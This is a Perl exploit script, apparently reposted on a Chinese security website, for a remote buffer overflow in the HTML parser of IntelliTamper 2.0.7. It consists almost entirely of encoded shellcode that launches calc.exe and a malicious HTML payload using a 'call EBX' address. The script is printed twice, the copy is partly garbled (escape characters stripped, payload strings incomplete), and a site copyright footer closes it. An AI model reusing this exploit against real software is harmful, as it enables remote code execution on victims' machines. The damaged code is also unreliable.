IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit
#!/usr/bin/perl
#
use warnings;
use strict;
# CMD="c:windowssystem32calc.exe"
# [*] x86/alpha_mixed succeeded, final size 344
my $shellcode =
"xdaxc3xd9x74x24xf4x5ax4ax4ax4ax4ax4ax4ax4ax4a" .
"x4ax4ax43x43x43x43x43x43x43x37x52x59x6ax41x58" .
"x50x30x41x30x41x6bx41x41x51x32x41x42x32x42x42" .
"x30x42x42x41x42x58x50x38x41x42x75x4ax49x4bx4c" .
"x4dx38x47x34x45x50x43x30x43x30x4cx4bx51x55x47" .
"x4cx4cx4bx43x4cx44x45x42x58x45x51x4ax4fx4cx4b" .
"x50x4fx45x48x4cx4bx51x4fx51x30x45x51x4ax4bx50" .
"x49x4cx4bx47x44x4cx4bx45x51x4ax4ex46x51x49x50" .
"x4dx49x4ex4cx4bx34x49x50x43x44x43x37x49x51x49" .
"x5ax44x4dx45x51x49x52x4ax4bx4cx34x47x4bx51x44" .
"x47x54x45x54x43x45x4dx35x4cx4bx51x4fx47x54x45" .
"x51x4ax4bx43x56x4cx4bx44x4cx50x4bx4cx4bx51x4f" .
"x45x4cx45x51x4ax4bx4cx4bx45x4cx4cx4bx43x31x4a" .
"x4bx4cx49x51x4cx51x34x43x34x48x43x51x4fx50x31" .
"x4cx36x45x30x51x46x42x44x4cx4bx51x56x46x50x4c" .
"x4bx47x30x44x4cx4cx4bx42x50x45x4cx4ex4dx4cx4b" .
"x45x38x43x38x4bx39x4cx38x4cx43x49x50x43x5ax50" .
"x50x43x58x4ax50x4dx5ax45x54x51x4fx42x48x4cx58" .
"x4bx4ex4dx5ax44x4ex46x37x4bx4fx4ax47x42x43x46" .
"x5ax51x4cx42x57x42x49x42x4ex42x44x42x4fx42x57" .
"x43x43x51x4cx43x43x44x39x43x43x43x44x43x55x42" .
"x4dx47x43x50x32x51x4cx43x53x45x31x42x4cx42x43" .
"x46x4ex45x35x44x38x42x45x43x30x45x5ax41x41";
my $evil_html = 'ph33r ' .
#' ' "x39x5cx3dx7e" . # ascii friendly 'call EBX'
'.htm">ph33r' .
"";
print $evil_html;
#
use warnings;
use strict;
# CMD="c:windowssystem32calc.exe"
# [*] x86/alpha_mixed succeeded, final size 344
my $shellcode =
"xdaxc3xd9x74x24xf4x5ax4ax4ax4ax4ax4ax4ax4ax4a" .
"x4ax4ax43x43x43x43x43x43x43x37x52x59x6ax41x58" .
"x50x30x41x30x41x6bx41x41x51x32x41x42x32x42x42" .
"x30x42x42x41x42x58x50x38x41x42x75x4ax49x4bx4c" .
"x4dx38x47x34x45x50x43x30x43x30x4cx4bx51x55x47" .
"x4cx4cx4bx43x4cx44x45x42x58x45x51x4ax4fx4cx4b" .
"x50x4fx45x48x4cx4bx51x4fx51x30x45x51x4ax4bx50" .
"x49x4cx4bx47x44x4cx4bx45x51x4ax4ex46x51x49x50" .
"x4dx49x4ex4cx4bx34x49x50x43x44x43x37x49x51x49" .
"x5ax44x4dx45x51x49x52x4ax4bx4cx34x47x4bx51x44" .
"x47x54x45x54x43x45x4dx35x4cx4bx51x4fx47x54x45" .
"x51x4ax4bx43x56x4cx4bx44x4cx50x4bx4cx4bx51x4f" .
"x45x4cx45x51x4ax4bx4cx4bx45x4cx4cx4bx43x31x4a" .
"x4bx4cx49x51x4cx51x34x43x34x48x43x51x4fx50x31" .
"x4cx36x45x30x51x46x42x44x4cx4bx51x56x46x50x4c" .
"x4bx47x30x44x4cx4cx4bx42x50x45x4cx4ex4dx4cx4b" .
"x45x38x43x38x4bx39x4cx38x4cx43x49x50x43x5ax50" .
"x50x43x58x4ax50x4dx5ax45x54x51x4fx42x48x4cx58" .
"x4bx4ex4dx5ax44x4ex46x37x4bx4fx4ax47x42x43x46" .
"x5ax51x4cx42x57x42x49x42x4ex42x44x42x4fx42x57" .
"x43x43x51x4cx43x43x44x39x43x43x43x44x43x55x42" .
"x4dx47x43x50x32x51x4cx43x53x45x31x42x4cx42x43" .
"x46x4ex45x35x44x38x42x45x43x30x45x5ax41x41";
my $evil_html = '
#' ' "x39x5cx3dx7e" . # ascii friendly 'call EBX'
'.htm">ph33r' .
"";
print $evil_html;
版权声明
本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。
本文地址:/websafe/Exploit/149276.html
